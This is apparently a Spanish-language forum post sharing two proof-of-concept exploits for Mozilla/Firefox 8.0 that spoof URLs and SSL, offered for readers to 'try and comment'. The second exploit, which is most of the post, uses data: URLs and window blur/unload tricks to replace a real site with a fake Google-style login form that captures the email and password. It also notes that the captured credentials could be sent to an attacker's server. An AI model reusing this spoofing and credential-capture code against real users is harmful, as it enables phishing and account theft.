Prueben y comenten:
mozilla 8.0 (URL & SSL Spoofing):
function gotogo(){
setTimeout("document.location.href='[Enlace externo eliminado para invitados]);
setTimeout("history.back();",100);
}
</script>
<a href="[Enlace externo eliminado para invitados]" onclick="gotogo();">clickme and forward me</a>
mozilla 8.0-2 (Advanced URL & SSL Spoofing/Remote code execution):
<body>
<script>
var targetUrl = "[Enlace externo eliminado para invitados]";
var dataUrl1 = "data:text/html," + encodeURIComponent(<><![CDATA[
<a href="javascript:opener.b(window)">Click me (open google)</a>
]]></>.toString());
var dataUrl2 = "data:text/html," + encodeURIComponent(<><![CDATA[
<body onload="document.getElementById('Email').focus()">
<script>
function c() {
var e = document.getElementById("Email");
var p = document.getElementById("Passwd");
if (!e.value && !p.value) return;
var s = "Email: " + e.value + "\nPassword: " + p.value;
s += "\n\nAn attacker can send this information to the attacker's server.";
alert(s);
}
<]]><![CDATA[/script>
<pre>
<strong>Sign in</strong>
<form onsubmit="c(); return false" action="javascript:">
<label>Email
<input type="text" id="Email">
</label>
<label>Password
<input type="password" id="Passwd">
</label>
<input type="submit" value="Sign in">
</form>
</pre>
</body>
]]></>.toString());
var dataUrl3 = "data:text/html," + encodeURIComponent(<>
<style><![CDATA[
* {
padding: 0px;
margin: 0px;
}
iframe {
border: none;
width: 100%;
height: 100%;
}
]]></style>
<iframe src={dataUrl2}></iframe>
</>.toString());
function a() {
open(dataUrl1);
}
function b(w) {
w.onblur = function() {
w.onblur = null;
w.alert(1);
var w2 = open(targetUrl);
w2.onunload = function() {
setTimeout(function() {
w2.location = dataUrl3;
w2.close();
}, 0);
};
};
w.close();
}
</script>
<pre>
Steps to reproduce:
1. <a href="javascript:a()">Click me</a> to open a new tab.
2. In the new tab, click a link.
3. A fake page is loaded.
</pre>
</body>
Siempre por aqui
